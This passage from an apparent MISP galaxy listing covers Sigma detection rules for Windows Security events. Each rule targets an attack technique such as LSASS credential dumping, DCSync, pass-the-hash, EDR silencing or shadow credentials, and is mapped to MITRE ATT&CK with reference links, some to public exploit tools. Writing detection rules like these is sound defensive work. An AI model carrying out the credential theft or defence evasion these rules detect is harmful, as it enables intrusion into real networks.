https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html

https://threathunterplaybook.com/library/windows/active_directory_replication.html

https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml

Password Protected ZIP File Opened (Email Attachment)

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

The tag is: misp-galaxy:sigma-rules="Password Protected ZIP File Opened (Email Attachment)"

Password Protected ZIP File Opened (Email Attachment) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 9057. Table References

Links

https://twitter.com/sbousseaden/status/1523383197513379841

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml

HackTool - EDRSilencer Execution - Filter Added

Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.

The tag is: misp-galaxy:sigma-rules="HackTool - EDRSilencer Execution - Filter Added"

HackTool - EDRSilencer Execution - Filter Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9058. Table References

Links

https://github.com/netero1010/EDRSilencer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hktl_edr_silencer.yml

ETW Logging Disabled In .NET Processes - Registry

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

The tag is: misp-galaxy:sigma-rules="ETW Logging Disabled In .NET Processes - Registry"

ETW Logging Disabled In .NET Processes - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9060. Table References

Links

https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables

https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf

https://twitter.com/xpn/status/1268712093928378368

https://bunnyinside.com/?term=f71e8cb9c76a

http://managed670.rssing.com/chan-5590147/all_p1.html

https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr

https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38

https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code

https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39

https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml

SAM Registry Hive Handle Request

Detects handles requested to SAM registry hive

The tag is: misp-galaxy:sigma-rules="SAM Registry Hive Handle Request"

SAM Registry Hive Handle Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

Table 9061. Table References

Links

https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml

SysKey Registry Keys Access

Detects handle requests and access operations to specific registry keys to calculate the SysKey

The tag is: misp-galaxy:sigma-rules="SysKey Registry Keys Access"

SysKey Registry Keys Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 9062. Table References

Links

https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml

Suspicious Scheduled Task Creation

Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Creation"

Suspicious Scheduled Task Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9063. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml

RDP over Reverse SSH Tunnel WFP

Detects svchost hosting RDP termsvcs communicating with the loopback address

The tag is: misp-galaxy:sigma-rules="RDP over Reverse SSH Tunnel WFP"

RDP over Reverse SSH Tunnel WFP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9064. Table References

Links

https://twitter.com/SBousseaden/status/1096148422984384514

https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml

Azure AD Health Service Agents Registry Keys Access

This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.

The tag is: misp-galaxy:sigma-rules="Azure AD Health Service Agents Registry Keys Access"

Azure AD Health Service Agents Registry Keys Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 9065. Table References

Links

https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml

https://o365blog.com/post/hybridhealthagent/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml

Password Dumper Activity on LSASS

Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN

The tag is: misp-galaxy:sigma-rules="Password Dumper Activity on LSASS"

Password Dumper Activity on LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9066. Table References

Links

https://twitter.com/jackcr/status/807385668833968128

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml

Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.

The tag is: misp-galaxy:sigma-rules="Suspicious Teams Application Related ObjectAcess Event"

Suspicious Teams Application Related ObjectAcess Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 9067. Table References

Links

https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens

https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml

Weak Encryption Enabled and Kerberoast

Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.

The tag is: misp-galaxy:sigma-rules="Weak Encryption Enabled and Kerberoast"

Weak Encryption Enabled and Kerberoast has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9068. Table References

Links

https://adsecurity.org/?p=2053

https://blog.harmj0y.net/redteaming/another-word-on-delegation/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml

User Added to Local Administrator Group

Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity

The tag is: misp-galaxy:sigma-rules="User Added to Local Administrator Group"

User Added to Local Administrator Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9069. Table References

Links

https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4732

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml

Hidden Local User Creation

Detects the creation of a local hidden user account which should not happen for event ID 4720.

The tag is: misp-galaxy:sigma-rules="Hidden Local User Creation"

Hidden Local User Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 9070. Table References

Links

https://twitter.com/SBousseaden/status/1387743867663958021

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml

Password Protected ZIP File Opened (Suspicious Filenames)

Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.

The tag is: misp-galaxy:sigma-rules="Password Protected ZIP File Opened (Suspicious Filenames)"

Password Protected ZIP File Opened (Suspicious Filenames) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 9071. Table References

Links

https://twitter.com/sbousseaden/status/1523383197513379841

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml

SMB Create Remote File Admin Share

Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).

The tag is: misp-galaxy:sigma-rules="SMB Create Remote File Admin Share"

SMB Create Remote File Admin Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9072. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml

https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml

Processes Accessing the Microphone and Webcam

Potential adversaries accessing the microphone and webcam in an endpoint.

The tag is: misp-galaxy:sigma-rules="Processes Accessing the Microphone and Webcam"

Processes Accessing the Microphone and Webcam has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 9073. Table References

Links

https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072

https://twitter.com/duzvik/status/1269671601852813320

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml

Possible PetitPotam Coerce Authentication Attempt

Detect PetitPotam coerced authentication activity.

The tag is: misp-galaxy:sigma-rules="Possible PetitPotam Coerce Authentication Attempt"

Possible PetitPotam Coerce Authentication Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

Table 9074. Table References

Links

https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml

https://github.com/topotam/PetitPotam

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml

Potential AD User Enumeration From Non-Machine Account

Detects read access to a domain user from a non-machine account

The tag is: misp-galaxy:sigma-rules="Potential AD User Enumeration From Non-Machine Account"

Potential AD User Enumeration From Non-Machine Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 9075. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662

https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all

http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html

https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml

Active Directory User Backdoors

Detects scenarios where one can control another users or computers account without having to use their credentials.

The tag is: misp-galaxy:sigma-rules="Active Directory User Backdoors"

Active Directory User Backdoors has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9076. Table References

Links

https://adsecurity.org/?p=3466

https://msdn.microsoft.com/en-us/library/cc220234.aspx

https://blog.harmj0y.net/redteaming/another-word-on-delegation/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml

Possible Shadow Credentials Added

Detects possible addition of shadow credentials to an active directory object.

The tag is: misp-galaxy:sigma-rules="Possible Shadow Credentials Added"

Possible Shadow Credentials Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 9077. Table References

Links

https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html

https://twitter.com/SBousseaden/status/1581300963650187264?

https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml

WCE wceaux.dll Access

Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host

The tag is: misp-galaxy:sigma-rules="WCE wceaux.dll Access"

WCE wceaux.dll Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9078. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml

CobaltStrike Service Installations - Security

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement

The tag is: misp-galaxy:sigma-rules="CobaltStrike Service Installations - Security"

CobaltStrike Service Installations - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9079. Table References

Links

https://www.sans.org/webcasts/119395

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml

A New Trust Was Created To A Domain

Addition of domains is seldom and should be verified for legitimacy.

The tag is: misp-galaxy:sigma-rules="A New Trust Was Created To A Domain"

A New Trust Was Created To A Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9080. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml

Mimikatz DC Sync

Detects Mimikatz DC sync security events

The tag is: misp-galaxy:sigma-rules="Mimikatz DC Sync"

Mimikatz DC Sync has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 9081. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662

https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2

https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r

https://twitter.com/gentilkiwi/status/1003236624925413376

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml

Account Tampering - Suspicious Failed Logon Reasons

This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.

The tag is: misp-galaxy:sigma-rules="Account Tampering - Suspicious Failed Logon Reasons"

Account Tampering - Suspicious Failed Logon Reasons has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 9082. Table References

Links

https://twitter.com/SBousseaden/status/1101431884540710913

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml

Service Installed By Unusual Client - Security

Detects a service installed by a client which has PID 0 or whose parent has PID 0

The tag is: misp-galaxy:sigma-rules="Service Installed By Unusual Client - Security"

Service Installed By Unusual Client - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9083. Table References

Links

https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html

https://twitter.com/SBousseaden/status/1490608838701166596

https://www.x86matthew.com/view_post?id=create_svc_rpc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml

Enabled User Right in AD to Control User Objects

Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.

The tag is: misp-galaxy:sigma-rules="Enabled User Right in AD to Control User Objects"

Enabled User Right in AD to Control User Objects has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9084. Table References

Links

https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml

Win Susp Computer Name Containing Samtheadmin

Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool

The tag is: misp-galaxy:sigma-rules="Win Susp Computer Name Containing Samtheadmin"

Win Susp Computer Name Containing Samtheadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 9085. Table References

Links

https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py

https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py

https://twitter.com/malmoeb/status/1511760068743766026

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml

Suspicious Scheduled Task Update

Detects update to a scheduled task event that contain suspicious keywords.

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Update"

Suspicious Scheduled Task Update has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9086. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml

DCOM InternetExplorer.Application Iertutil DLL Hijack - Security

Detects a threat actor creating a file named iertutil.dll in the C:\Program Files\Internet Explorer\ directory over the network for a DCOM InternetExplorer DLL Hijack scenario.

The tag is: misp-galaxy:sigma-rules="DCOM InternetExplorer.Application Iertutil DLL Hijack - Security"

DCOM InternetExplorer.Application Iertutil DLL Hijack - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9087. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml

Windows Filtering Platform Blocked Connection From EDR Agent Binary

Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.

The tag is: misp-galaxy:sigma-rules="Windows Filtering Platform Blocked Connection From EDR Agent Binary"

Windows Filtering Platform Blocked Connection From EDR Agent Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9088. Table References

Links

https://github.com/netero1010/EDRSilencer

https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983

https://github.com/amjcyber/EDRNoiseMaker

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml

Pass the Hash Activity 2

Detects the attack technique pass the hash which is used to move laterally inside the network

The tag is: misp-galaxy:sigma-rules="Pass the Hash Activity 2"

Pass the Hash Activity 2 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 9090. Table References

Links

https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/

https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events

https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml

Outgoing Logon with New Credentials

Detects logon events that specify new credentials

The tag is: misp-galaxy:sigma-rules="Outgoing Logon with New Credentials"

Outgoing Logon with New Credentials has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"

Table 9091. Table References

Links

https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml

External Remote SMB Logon from Public IP

Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.

The tag is: misp-galaxy:sigma-rules="External Remote SMB Logon from Public IP"

External Remote SMB Logon from Public IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9093. Table References

Links

https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html

https://twitter.com/Purp1eW0lf/status/1616144561965002752

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml

Failed Logon From Public IP

Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.

The tag is: misp-galaxy:sigma-rules="Failed Logon From Public IP"

Failed Logon From Public IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 9094. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml

RDP Login from Localhost

RDP login with localhost source address may be a tunnelled login

The tag is: misp-galaxy:sigma-rules="RDP Login from Localhost"

RDP Login from Localhost has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9095. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml

A Security-Enabled Global Group Was Deleted

Detects activity when a security-enabled global group is deleted

The tag is: misp-galaxy:sigma-rules="A Security-Enabled Global Group Was Deleted"

A Security-Enabled Global Group Was Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9096. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml

Successful Account Login Via WMI

Detects successful logon attempts performed with WMI

The tag is: misp-galaxy:sigma-rules="Successful Account Login Via WMI"

Successful Account Login Via WMI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 9097. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml

Potential Access Token Abuse

Detects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag".

The tag is: misp-galaxy:sigma-rules="Potential Access Token Abuse"

Potential Access Token Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

Table 9098. Table References

Links

https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html

https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml

A Member Was Removed From a Security-Enabled Global Group

Detects activity when a member is removed from a security-enabled global group

The tag is: misp-galaxy:sigma-rules="A Member Was Removed From a Security-Enabled Global Group"

A Member Was Removed From a Security-Enabled Global Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9099. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml

RottenPotato Like Attack Pattern

Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like

The tag is: misp-galaxy:sigma-rules="RottenPotato Like Attack Pattern"

RottenPotato Like Attack Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 9100. Table References

Links

https://twitter.com/SBousseaden/status/1195284233729777665

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml

Remote WMI ActiveScriptEventConsumers

Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network

The tag is: misp-galaxy:sigma-rules="Remote WMI ActiveScriptEventConsumers"

Remote WMI ActiveScriptEventConsumers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9101. Table References

Links

https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml

Scanner PoC for CVE-2019-0708 RDP RCE Vuln

